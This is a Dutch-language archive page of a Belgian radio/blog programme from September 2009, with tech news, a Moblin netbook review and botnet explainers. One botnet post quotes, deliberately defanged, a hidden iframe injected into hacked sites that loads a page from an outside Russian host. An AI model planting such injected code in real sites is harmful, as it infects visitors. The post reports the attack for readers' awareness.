Search

Archives

Pages

Op mijn desktop:

Suggesties, commentaar, ... (klik of schrijf zelf:)e-mail webgang
Laatste titels:

De botnets nemen over (botnets deel 3)

Uitzending do 18:00 ** September 24th, 2009 by wim.webgang **

Kopiefeest 24 – 25 – 26 september 2009 in Leuven:
We overlopen nog eens het programma van deze copyleft-driedaagse.

Muziek:

    Klitzkov:
  • Young Girl
  • Turning Page

Botnet Deel 3: the botnets are taking over
====================================
botnet

Er is een nieuwe botnet aanval gemeld eind augustus-begin september. Verschillende websites merkten kleine probleempjes met de layout van de pagina. Nader onderzoek leerde dat er een eigenaardig stukje code in de site zat, dat de layout in de war stuurde.

Dat zag er zo uit:
(ik heb opzettelijk de iframe begin < en eind > tekens erafgelaten om de code niet werkend te maken)

iframe src="http://u7x.ru:8080/index.php" width=156 heigth=196 style="visibility: hidden"
/iframe

Met andere woorden: in dit stukje code wordt een pagina opgeroepen van een andere website, die bovendien op een webserver draait met een niet-standaard poort (8080 ipv 80). Aan verschillende belangrijke bladzijden op de site is het stukje code toegevoegd: index.php, index.html, index.htm, index2.htm, indexnewsnot.htm, default.php enz.
Read the rest of this entry »

Lift ^ | Lift v | Comments Off

Fout spreadsheet attachment * Zandstorm bedreigt datacenter * GPL overwint in Frankrijk * Galileoscoop * Microsoft en Vrije Software

i-nieuws 6 na 6 ** September 24th, 2009 by wim.webgang **

24/09/2009


Fout spreadsheet attachment

Een Britse internet provider had een e-mail gemaakt met uitleg hoe hun nieuwe electronische betaalsysteem te gebruiken. Per vergissing werd met die mail een attachment meegestuurd met daarin een lijst van 3600 klanten. De lijst bevatten naam, e-mail adres, login, en wachtwoord. Volgens PCpro heet de internetprovider “Demon Internet”

Ik ben eens benieuwd wat voor reakties ze gaan krijgen op hun klant-tevredenheidsenquete die momenteel op hun website loopt…

pcpro
http://www.demon.net

Zandstorm bedreigt datacenter

Een zandstorm in Australie maakt het datacentra moeilijk. De ventilatiesystemen dreigen te veel zand binnen te krijgen en moesten uitgeschakeld worden.
De zandstorm is volgens de Australische itnews website een van de ergste van zijn soort. Het goede nieuws is dat geen enkele datacenter zijn activiteiten moest staken, ze proberen wel de belasting van hun systemen laag te houden. Wat ook niet gemakkelijk is nu iedereen in Australie foto’s van de zandstorm begint te delen, wat weer een piek in trafiek geeft.

GPL overwint in Frankrijk

Een Frans bedrijf dat de regels van de GPL had overtreden, werd voor de rechtbank gedaagd en werd veroordeelt voor die overtreding. Het bedrijf ging in beroep, maar verloor ook daar, en is nu veroordeelt tot 8000 euro plus de cost van de beide rechtszaken en twee experten.
Het veroordeelde bedrijf is gespecialiseerd in technische opleidingen, en ontwikkelde daar zelf een aantal hulpmiddelen voor. Ze hadden de uitrusting mogen doen van de computerzalen van AFPA, een organisatie voor volwassenenonderwijs. Ze gebruikten daarbij bestaande GPL software om computers op afstand te bedienen. Ze hadden die software zelf aangepast aan de door hen gebruikte installatie. Bij navraag door AFPA weigerde de leverancier echter de broncode van de gewijzigde versie te geven. Meer nog, ze hadden uit de VNC software alle vermeldingen naar de GPL licentie verwijderd.

Een regeling buitenaf lukte niet, en dus stapte de AFPA naar de rechtbank.
De GPL licentie kent opzettelijk rechten toe aan de gebruikers, juist om de “vendor lock-in” of “gijzeling” van de gebruiker door een leverancier te vermijden.

VNC werd oorspronkelijk ontwikkeld door Tristan Richardson toen hij werkte voor het gezamelijke onderzoekslabo van Olivetti en Oracle. Dat werd nadien opgekocht door AT&T, det het onderzoekslab een paar jaar later sloot. De code was uitgebracht onder de GPL, de oorspronkelijke ontwikkelaars werkten er zelf verder aan en er bestaan nu allerlei varianten van voor verschillende computersystemen en toepassingen.

AFPA:

http://www.afpa.fr/

Uitspraak:
arret-ca-paris-16.09.2009.pdf

VNC:
software afstandsbediening

Galileoscoop

Doug Arion, Rick Fienberg en Steve Pompea kregen in de aanloop naar 2009, het internationaal jaar van de astronomie, het idee om kinderen te voorzien van een goedkope, maar echt werkende, telescoop. Ze haalden het idee van het “one laptop per child” project, en wilden een “one telescope per child”, de Galileoscoop. In hun oorspronkelijk plan zou die 10 dollar kosten, maar dat bleek niet haalbaar; het werd 20 dollar. Maar de stap van concept naar massale verspreiding moet nog gezet worden, momenteel zijn ze op zoek naar financiering voor hun project. Daarvoor laten ze bekende figuren hun handtekening zetten op de doos van een Galileoscoop, en die worden dan verkocht op een internetveiling. Ook denken ze aan het concept van “1 kopen, 1 geven”, waarbij een koper de prijs betaalt van 2 stuks; 1 is voor hem, en de andere gaat naar een kind.

Volgens getuigenverslagen kan je er de maan, Jupiter en Saturnus mee zien.
Op de site staat ook een foto, genomen door de telescoop:
1 telescope per child
http://www.astrosphere.org

Microsoft en Vrije Software

Microsoft heeft software gemaakt en uitgegeven onder de GPL. Dat is in grote contradictie met hun marketingpraatjes over Linux van de voorbije 10 jaren: Linux was kanker, de GPL was een vloek. Maar de laatste jaren draaien ze bij, en het is bij nader inzien dikwijls in eigenbelang. Zo werd vorige week aangekondigd dat ze zelfs code bijdroegen voor de Linux Kernel!

Wie iets dieper graaft komt er echter op uit dat in de markt van de virtualisatie MS het lelijke eendje is. Producten als VMWare staan veel verder, en hebben bovendien erkenning door certificatie. Microsoft’s eigen virtualisatietechniek past wel in een Windows-winkel, maar kan niet zo goed om met andere systemen als Linux. En net daarom is het voor hen belangrijk dat hun “drivers” in de Linux kernel passen; het maakt hun Virtualiseringsplatform beter in het draaien van Linux als een van de systemen.

Bovendien had een programmeur ontdekt dat Microsoft, die de drivers voordien al in gebruik had, er code in gebruikte uit Linux. Dat was dus een duidelijke overtreding van de licentie van de Linux-code. Zowat de enige manier die MS nog had om zijn gezicht te redden was die driver uitbrengen onder de GPL.

MS en GPL
Server Virtualisation

Lift ^ | Lift v | Comments Off

1111 1111

Uitzending do 18:00 ** September 17th, 2009 by Lydia **

kassa1111Berlin (L,°) Lydia Programmeurs hebben nu hun eigen feestdag (zie nieuws): de 256e dag van het jaar. Allez, ja, programmeurs tellen niet 1, 2, 3 maar 0, 1, 2 dus 255. En in binair is dat 1111 1111. Wikipedia wiste het oorspronkelijk artikel toen het nog maar een “underground” feestdag was van nerds. Nu heeft Rusland het officieel als feestdag ingevoerd…

Kopiefeest 24 – 25 – 26 september 2009

Interview met Michel, organisator van dit driedaagse ‘festival’ waarin auteurs even niet onder Sabam vallen: ze geven hun werk immers uit onder de Creative Commons en andere copyleft-licenties.

Oogst: muziek, dj-sets, films, debat, enz.

Een openbare bibliotheek in Leuven als locatie voor deze underground scene, die ondertussen wel opmerkelijk groeit.

Zie ook netwaves site.

Muziek:

Klitzkov maakte een CDtje, en die belandde vers van de pers in de studio.
We luisterden naar de nummers ‘How did u know?’, ‘1986′ en ‘I got her cookie’.
Je kan ook steeds eens gaan piepen op zijn myspaceprofiel.

Lift ^ | Lift v | Comments Off

Gepakt hout * Programmeursdag * Eerste nieuwe zonnestralen * reCAPTCHA opgekocht * Zuipen op zolder

i-nieuws 6 na 6 ** September 17th, 2009 by wim.webgang **

17/09/2009


Gepakt hout

Een ontwikkelaar van Delicious Library ontdekte dat zijn idee overgenomen was in een programma in de “iTunes App Store”. Bovendien was het hout in zijn “Library” gewoon gekopieerd naar het andere programma, ze gebruikten voor de achtergrond van de boekenkast “zijn hout”. Ondanks dat hij het niet de moeite vond om een rechtszaak aan te spannen vanwege één gekopieerd beeld, zocht hij naar een andere reaktie. Hij vermeldde op een twitter het bedrijf en de feiten, en kreeg vrij snel reaktie van de “daders”. Ze verontschuldigden zich en beloofden een update met verwijdering van het betwiste beeld.

De copycat was Netwalk met Movies, een persoonlijke filmcatalogus. Ze maken op hun site reklame met:
The movie list has 3 visualisation options, "Wood", "Charcoal" and "Metal" which makes browsing your movie list a pleasure for the eye.

Ze zeggen er niet bij dat het iemand anders’ hout is.

Programmeursdag

De Russische president heeft een nieuwe feestdag in het leven geroepen: “programmeursdag”. De 256e dag van het jaar werd uitgekozen, en dat bleek 13 september te zijn, behalve in een schrikkeljaar, dan is de 256e dag 12 september.

De keuze is niet verwonderlijk, want programmeurs vierden het informeel al jaren als hun dag, de Rus Valentine Balt zou het in 2002 voorgesteld hebben.
De keuze van 256 doet denken aan een speciaal getal, ook herkenbaar als geheugengrootte. Het is 2 tot de 8e macht, of met andere woorden
2 x 2 (=4) x 2 (=8) x 2 (=16) x 2 = (32) x 2 (=64) x 2 (=128) x 2 (=256), dus de hoogste macht van 2 die als teller kan dienen voor een dag in het jaar (de volgende waarde zou 512 zijn).

Typisch voor programmeurs: ze beginnen de dagen van het jaar te tellen vanaf 0; waarbij 1 januari dus dag nul is, en dan verder tot dag 255. Dat getal in binair is 1111 1111 of dus 8 keer 1, of de hoogst mogelijk weer te geven binaire waarde met 8 digits. De 8 enen vormen ook het logo op de “programmer day info” website.

De website zou al 2 jaar bestaan maar daar is inhoudelijk niets van te merken momenteel: programmerday.info

En hier de website van het Kremlin met de officiële aankondiging van het besluit op 12 september 2009:
http://eng.kremlin.ru/text/

Eerste nieuwe zonnestralen

Nadat de overname bekend werd van Sun door Oracle werden er in de free software community veel vragen gesteld over MySQL, Java, OpenOffice, en openSolaris. Wat hardware betreft was de vraag of die afgestoten zou worden, of integendeel juist een mooie aanvulling zou vormen voor Oracle’s databank-aanbod.
Gisteren werd bekend dat Oracle zijn nauwe samenwerking met HP opzegt omdat ze zich willen concentreren op de Sun server-hardware.
Oracle ontwikkelde samen met Sun een nieuwe versie van “Exadata”, een speciale database server.
Oracle betaalde 7 miljard dollar voor Sun, dat de 4e grootste servermaker ter wereld was op dat moment.

De overgangsperiode tussen de aankondiging van de koop en de goedkeuring door allerlei overheidsinstanties werd door concurrenten als HP en IBM al gebruikt om server-klanten weg te snoepen vanwege de zogenaamde “onzekerheid”. Ze deden akties met “migratietrajecten” om over te stappen van Sun naar hun eigen hardware.
Mogelijk is deze aankondiging daar al een reaktie op.
Volgens dit artikel in information week is het zelfs puur protectionisme en opzettelijke vertraging door de EU, en spreekt van pure arrogantie van Neelie Kroes.

reCAPTCHA opgekocht

reCAPTCHA, een bedrijf dat het Captcha systeem gebruikt voor een extra doel, is opgekocht door Google.
Het gewone Captcha systeem waarbij gebruikers een moeilijk leesbaar stukje tekst in moeten tikken alvorens ze een bericht op een site kunnen zetten, wordt gebruikt om te testen of het wel een mens is die probeert te posten, en niet een automatisch programma dat spam op de site probeert te zetten. De in te geven code bestaat uit willekeurige letters en cijfers die door de computer gekozen worden en die in een drukke achtergrond gezet worden.

reCAPTCHA gebruikt in plaats van willekeurige letters en cijfers stukjes scans uit boeken. Ze hebben oude boeken en kranten ingescand, en alles wat de computer niet kon lezen is opgeslagen als captcha. Als de gebruikers het ontcijferen wordt dat opgeslagen als oplossing van de onleesbare stukken. Google is bezig met een groot digitaliseringsproject van oude boeken en geschriften, en daarbij kan deze techniek goed van pas komen.

Zuipen op zolder

De Attic bar in Newcastle in Groot-Brittanië heeft een originele alcohol-lotto ingevoerd. Wie om 3 uur, bij sluitingtijd, in de alcoholmeter blaast en nog onder de de wettelijke norm zit, krijgt zijn inkom van de avond terug wegens doel gemist. Wie de hoogste score haalt mag volgende keer gratis binnen (de inkom is 1 pond).

De overheden smoorden de campagne voor de speciale “dinsdagavond-aktiviteit” in de kiem. Een Britse gezondheidsdienst maakte de media attent op alcohol als zijnde de 3e-grootste oorzaak van handicaps en doodgeboorte bij zwangerschappen. Dokters in GB vroegen vorige week een volledig verbod op alcoholreklame en sponsering van muziek-en sportmanifestaties door betreffende bedrijven.

Nadat het nieuwtje een paar keer werd overgenomen van de ene website naar de andere kreeg wie onder de norm zat zijn hele rekening kwijtgescholden en ging de advertentie de wereld in als “Niet bezopen, geld terug”.

Lift ^ | Lift v | Comments Off

Aspire On D150 Moblin 2.1

WebGang blog ** September 17th, 2009 by wim.webgang **

Moblin is (geen) Linux

Moblin 2.1 vanaf een bootable DVD gedraaid op een netbook via een externe USB-drive (wat tov normaal gebruik veel trager werkt)

1) Sober
Het “menu” bovenaan het scherm is zeer eenvoudig en in zwart/wit Daardoor lijkt het zich een beetje te onderscheiden van het werkscherm, en lijkt het bijna alsof de “knoppen” van die knoppenbalk op de zwarte rand van je scherm staan. Links bovenaan datum en tijd, de linkse kolom je agenda bij openen (hier zou je wel direct moeten kunnen klikken om iets toe te voegen – ik ben via toepassingen moeten gaan. Eens dat er een afspraak inzit kan je er wel op klikken om de agenda te krijgen).

2) Opgeruimd
Als je een programma start gaan eerst alle menu’s van je scherm, en lijkt het programma te starten op een “propere desktop” of dus een leeg scherm, met alleen een achtergrondkleur op dat moment. Dat geeft het gevoel dat je computer met je meedenkt.
De browser gebruikt daarna ook zoveel mogelijk schermoppervlakte, hij heeft dus geen eigen rand, behalve rechts de schuifbalk.

3) Stijlvol
De zwarte balk bovenaan is in de browser nog verantwoordelijk voor de URL en een paar eenvoudige knoppen waaronder rechts een kruisje voor sluiten. Klik je ergens onbepaald bovenin de zwarte balk schuift het algemeen menu terug naar beneden.

4) Bediening
Als je een programma sluit gaat het venster ervan dicht en komt het menu terug op je desktop, een beetje in slow motion maar toch zo snel dat je er nooit op zit te wachten. Meer als een subtiele “animatie”. Het rechtsklikken dat ik gewend ben van Linux werkt hier bijna nergens (wel bv in de tabbladen van de browser).
Ik probeer “ALT-TAB” en inderdaad, dat levert een overzicht op van alle gestarte programma’s. Trouwens via het menu kan je dat bereiken door op “zones” te klikken. Daar wordt een miniatuurversie getoond van de programma’s die gestart zijn.
Als je in de browser net geklikt had voordien, zie je hier de miniatuurversie de gevraagde site opladen in het klein. Als je een terminal met “top” hebt openstaan wordt die continue geupdate in de kleine versie.
Bij systeem kan je de taal omschakelen naar Nederlands (Belgie), maar dat werkt pas vanaf de volgende opstart.

5) Snel
Als je de browser gebruikt hebt blijft nadien op het voorblad of openingsscherm van je Moblin een mini-afbeelding van de site staan die je laatst bezocht had. Met 1 klik ben je er dan terug naartoe.

6) Media
Ook de media-player heeft zo’n geheugenfunctie en laat je toe te zoeken naar foto’s of filmpjes.

7) Sociaal
Moblin lijkt erg gericht op sociale netwerksites en functies. In “people” verschijnen al je contacten op je destop in de vorm van kadertjes met een foto.

8) Offline.
Er is bij netwerk een knop voor wifi, wired, 3G, Wimax en bluetooth. En er is een “Offline” knop, waarmee je alle externe verbindingen kan afzetten.

Spijtig genoeg werkt de “wireless” mogelijkheid niet (op deze netbook met een aparte “schakelaar”, de internetverbinding met de lan verbinding werkte wel.

9) Terminal
In de applications ontdek je een “terminal” programma; daarme krijg je een levensechte “commandolijn” zoals in Linux. Allerlei commando’s werken er, bv “top” laat de lopende processen zien, en daar leer je dat er een Xorg draait, een gnome terminal en een mozilla helper, die allemaal als user “moblin” hebben, terwijl een aantal andere processen root als user hebben (bv proces 1 init); sudo vraagt je het (onbekende) wachtwoord van root.

10) Applicatons

De Software Installer werkt en toont je de top-10 van meestgevraagde programma’s (op dit moment: Fspot, firefox, frozen bubble, gimp, pidgin, flicr uploader, songbird musicplayer, thunderbird, transmission BitTorrent client, World of Goo Demo.
Verder heb je een onderverdeling om programma’s te installeren uit de categorie hulpmiddelen, spelletjes, media enz. Bij office valt op dat er enkel een pdf-lezer en Abiword staan, en geen openoffice. In ieder geval kan je met 1 klik een programma installeren vanop het internet.
En er is onderaan in het rubriekenmenu een heel vriendelijke link “get the source code”.
Als je daarop klikt kom je terecht in

http://repo.moblin.org/moblin/garage/2.0/oss/source

Garage is Moblin’s “download shop”.

Een aantal programma’s waren al aanwezig, en ze zijn onderverdeeld in gebruiksgebieden als accesoires, spelen, media, kantoor, settings, netwerk, systeem…
- Archive manager is een soort bestandsmanager die je vanuit de live cd toelaat op je harde schijf te kijken in bv de geïnstalleerde Linpus of Ubuntu Netbook Remix.
- Bij internet, e-mail start Anjal, een mail-client afgeleid van Evolution maar die in deze versie ook het scherm volledig gebruikt zonder een rand te laten.
- Bij de spelletjes bv een verslavende minigolf (neverputt).

Er valt veel te ontdekken, en toch komt ook veel bekend voor als je Linux gebruiker bent. Hopelijk krijgen zoveel mogelijk ontwikkelaars, computerbouwers en gebruikers Moblin te zien, al is het maar om te leren beseffen dat er echt wel een alternatief is dat zijn kwaliteiten heeft.

Misschien de meestgestelde vraag over moblin is waar in het menu je kan “stoppen” of “uitschakelen”. Wel, het antwoord is eenvoudig: nergens. Omdat de ontwikkelaars er van uitgaan dat je daarvoor de aan-uit knop van het toestel indrukt. Als je dat doet krijg je een waarschuwing dat het toestel uitgeschakeld gaat worden binnen 30 seconden (in vorige versies sloot het gewoon af zonder meldingen). Of hoe gebruikers toch geconditioneerd kunnen zijn…

In de browser is er een menu met Main Menubar, Bookmarks, History, Downloads en .. “Start Private Browsing”

Als je in dezelfde browser trouwens Preferences kiest uit het menu, dan krijg je het herkenbare Firefox instellingen scherm.

CTRL-ALT-F1 brengt je op een console scherm met de startmelding en de systeemversie (foto).

Maar met ALT-F7 of ALT-F8 geraak je niet terug in het grafisch scherm (zoals normaal in Linux). CTRL-ALT-F8 toont een log, en de verder combinaties richting 9, 10, 11 leveren niets nieuws. Wel ALT-F2: dat brengt je terug in het grafisch scherm.

http://moblin.org/community/blogs/imad/2009/moblin-v20-moblin-garage-and-moblin-v21

Lift ^ | Lift v | Comments Off

Freija

FOSS-IT, Uitzending do 18:00 ** September 10th, 2009 by wim.webgang **

Uitgebreide CityGang met de aanwezigheid van de “Freija-gang” gewapend met tekst, muziek en instrumenten.
Lieflijke muziek die als achtergrond bij een etentje zou passen …
tot iemand zich verslikt bij het luisteren naar de teksten.
Twee beelden zeggen meer dan duizend woorden, maar nog altijd minder dan de gezellige uitzending met live muziek van Freija met keyboard en gitaarbegeleiding (Koen).
freija20090910afreija20090910b
Natuurlijk aangevuld door stukjes interview: over het samen met Julie schrijven van teksten op zondagnamiddag, trouwfeest van een zus, dromen van “hobby naar beroep”, en het ontbreken van een website. Die Freija toch! Zeg het ze zelf op DFreija@HotMail enz u weet wel.

Muziek:

  • Home
  • Fed ex
  • Neigbour
  • Goodbye
  • The wedding is off
  • En generale repetitie voor een spontane creatie voor het trouwfeest van een nicht (knipoog naar Cheb Khaled’s Aisha)

En van demo-cd nog: “Happy” en “Temptation”.

Momenteel is nog geen werk van Freija D’Hondt uitgegeven, ze is soms wel live te beluisteren in Antwerpen en omgeving.

Lift ^ | Lift v | Comments Off

Monopoly via internet * Onderzoek naar computergebruik * Nieuwe Linux Kernel * Broncode opgeëist * TomTom gaat open source *

i-nieuws 6 na 6 ** September 10th, 2009 by wim.webgang **

10/09/2009

Monopoly via internet

Gisteren startte een wereldwijd Monopoly spel dat via internet gespeeld wordt. Als speelbord wordt de hele wereld gebruikt, met plannen van “Google Maps” en “Open Street Maps”. De combinatie straten kopen en huizen bouwen is overgenomen uit het bordspel. Er is zelfs een wedstrijd georganiseerd om 3D huizen te ontwerpen voor het internet Monopoly spel.

De makers van het spel worden duidelijk gesteund door Google, zo is de
“Veelgestelde Vragen” site op een google domein gehost, en worden nieuwe gebouwen ontworpen met Google’s sketchup, wat Linux gebruikers buitensluit.

Verder is er naast de monopoly site zelf, officieel “MonopolyCityStreets”, een blog, en de wedstrijd voor het ontwerpen van huizen die afsluit op 27 september; enkele van de winnaars zullen hun ontwerp zien opduiken in het internet spel.

De trigger om regelmatig te blijven spelen is een vorm van onteigening: als een speler een bod doet op een van je straten, en je antwoordt niet binnen 7 dagen, wordt het automatisch als aanvaard beschouwd, en ben je je straat kwijt.

Bij de start van het spel, woensdag, werden de servers onmiddellijk overrompeld, waardoor het lang duurde om binnen te geraken. Ook vandaag zijn de servers nog moeilijk bereikbaar. Voor het spel heb je Javascript en Flash nodig in je browser.

De officiele blog:

http://blog.monopolycitystreets.com/

Het spel zelf:

http://www.monopolycitystreets.com/

De F.A.Q.

http://docs.google.com/View?id=dfzghp76_3f3s5b6gr

Ontwerpen met sketchup:

http://sketchup.google.com/

Linux gebruikers kunnen eventueel “Wine” installeren om daarin de Windows versie van Sketchup te gebruiken.

Onderzoek naar computergebruik

Op “infoworld” kan je de resultaten bekijken van een onderzoek naar computergebruik. Van een 20-duizendtal computers werd gedetailleerd het gebruik bestudeerd, en daaruit werden conclusies getrokken over keuze van browsers, mediaplayers en officepaketten.

Enkele opvallende resultaten zijn:
- OpenOffice op meer dan 10 % van de systemen
- VLC als mediaplayer op de 3e plaats na wmp en itunes.
- Firefox rond 50 %

Het onderzoek betrof alleen Windows computers, er zijn dus geen conclusies voor Mac of Linux getrokken.

http://infoworld.com/windows-pulse

Broncode opgeëist

Leader Technologies klaagt Facebook aan voor een overtreding van een patent. De rechtbank besliste nu dat Facebook al zijn broncode moet overhandigen aan Leader Technologies, zodat die de overtredingen kunnen bewijzen. Een eerste keer werd dat verzoek afgewezen, maar nu bevestigde de rechter het en moet Facebook tegen 15 september de broncode op tafel leggen.

De klacht van Leader dateert al van 19 november 2008.


- De klacht.
- Het patent:

Nieuwe Linux Kernel

De nieuwe Linux Kernel is gisteren door Linus Torvalds vrijgegeven: versie 2.6.31.
Volgens Linus zijn de wijzigingen t.o.v. de vorige versie vooral te vinden in aanpassingen aan en uitbreidingen van drivers: dat zou nu al 70% van de wijzigingen beslaan, waar dat vroeger zo’n 50% was, en bij 2.6.27 al 60%.
Verder zijn er o.a. veel firmware, geluid, bestandsysteem updates.
Bovendien zijn er meer debugging mogelijkheden ingebouwd in de Linux-kern, maar dat is vooral belangrijk voor programmeurs, niet voor eindgebruikers op de desktop.

Bericht op de Linux Kernel Mailing List
Ter vergelijking: op een recente openSuse 11.1 draait nu 2.6.27

TomTom gaat open source

TomTom heeft aangekondigd een nieuw open source formaat te lanceren om informatie te delen die te maken heeft met kaarten en locaties. De informatie kan gebruikt worden in GPS systemen. De naam van het formaat is “OpenLR”, en LR staat voor Locatie Referentie. Ze zal uitgebracht worden onder de GPL.

TomTom is de firma die aangevallen werd door Microsoft over een patentinbreuk op het bestandssysteem, en er een schikking mee moest treffen. Het bedrijf gebruikte ooit een versie van Windows in zijn apparaten maar schakelde al gauw over op Linux, wat MS mogelijk voor het hoofd stootte. Hun patentklacht verwees ook naar het overblijvende bestandsformaat dat nog compatibel was met het dos/windows formaat.

Lift ^ | Lift v | Comments Off

Botnet kaping (2): omvang en motief

Uitzending do 18:00 ** September 4th, 2009 by wim.webgang **

Opwarming:
Zonwering of zonnefilter rond de aarde, zeewater in de wolken spuiten, regulerende zonnenspiegel op de maan, … Zotte ideeën om de wereld te redden van de opwarming van de aarde? Nee, onderzoek van de UK Royal Society

Botnet kaping

Vorige week vertelden we over wetenschappers die wisten te infiltreren in een botnet. We spraken over mebroot (rootkit), torpig (botnet), C&C (command and control servers), botmaster, zombies enz.

Vandaag kijken we naar de omvang en de criminele bedoelingen van het opzet van een botnet.
En onderaan vind je ook een verklaring van gebruikte termen.
Read the rest of this entry »

Lift ^ | Lift v | Comments Off

Laserkanon * Patent op home-page * De wereld is maakbaar

i-nieuws 6 na 6 ** September 3rd, 2009 by wim.webgang **

3/9/2009

Laserkanon

De Amerikaanse fabrikant van vliegtuigen en oorlogstuig, Boeing, heeft een eerste test gedaan met een laserkanon dat vanuit een vliegtuig een doel op de grond raakt.

Op een C-130 vliegtuig werd een laserkanon geïnstalleerd. Bij een testvlucht werd vanuit het vliegtuig een straal gerich op een voertuig op de grond. De energie van de straal zou het voertuig buiten gebruik stellen, zonder veel omgevingsschade.

De test werd uitgevoerd in de raketbasis van White Sands in het zuiden van de Verenigde Staten.

Darpa, het militaire onderzoeksinstituut in de VS, wil lasertoepassingen maken die de uitdagingen van militaire toepassingen aankunnen. In burgertoepassingen worden lasers met weinig kracht maar hoge bewegingssnelheid gebruikt, bv in .

Patent op home-page

Google is er in geslaagd een patent te nemen op zijn home-page. Het heeft jaren gekost eer het patent eindelijk werd toegekend. Ondertussen heeft het idee van een eenvoudige, bijna lege pagina, met in het midden een kader om een te zoeken begrip in te tikken al ingang gevonden bij Yahoo bv.
Google heeft ook vroeger al de vorm van zijn zoekresultaten gepatenteerd.

De wereld is maakbaar

De Britse “Royal Society” heeft een onderzoek gedaan naar technische middelen om de opwarming van de aarde aan te pakken. Ze onderzochten de haalbaarheid van een aantal scenario’s om bv minder zonlicht toe te laten tot de aarde of op een grootschalige manier CO2 uit de atmosfeer te halen. Enkele voorbeelden zijn:
- grote metalen strukturen in de zee bouwen waarop algenbanken kunnen ontwikkelen; algen kunnen de CO2 balans herstellen.
- Een reuze spiegel op de maan om het licht op aarde te “regelen”
- Wolkenfonteinen: er zou zeewater in de wolken gepompt kunnen worden, zodat de wolken meer aankomend zonlicht reflecteren
- Een reuze lamellen zonwering in de ruimte aanbrengen.
Sommige projecten zouden veel geld kosten en er zullen veel technische problemen opgelost moeten worden.
Het grootste probleem zal misschien het draagvlak zijn, en de organisatie. Er is een wereldorganisatie nodig om de kosten en de inspanningen te verdelen.

Uiteindelijk zullen op korte termijn toch andere maatregelen noodzakelijk blijven. In eerste instantie CO2 uitstoot opvangen en opslaan onder de grond in plaats van los te laten in de lucht en beter landbeheer doen met herbebossing zijn de eenvoudigste. Tegen 2050 moet de CO2 uitstoot al minstens gehalveerd zijn (in vergelijking met 1990), en ook dan moet ze nog verder dalen.

Link : op de bbc website

Commentaar:
Read the rest of this entry »

Lift ^ | Lift v | Comments Off